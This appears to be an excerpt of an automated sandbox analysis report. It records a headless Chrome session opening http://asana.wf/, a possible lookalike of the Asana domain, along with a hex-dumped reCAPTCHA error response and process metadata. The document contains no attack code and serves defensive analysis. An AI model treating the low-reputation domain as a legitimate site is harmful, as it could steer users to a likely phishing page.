                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:56 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                    Start time:21:54:51
                                                                                                                                                                                                                    Start date:25/04/2024
                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://asana.wf/
                                                                                                                                                                                                                    Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                    Start time:21:54:52
                                                                                                                                                                                                                    Start date:25/04/2024
                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1936,i,14722219438862826777,18196455829393117014,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                    Imagebase:0x7ff7f9810000
                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    No disassembly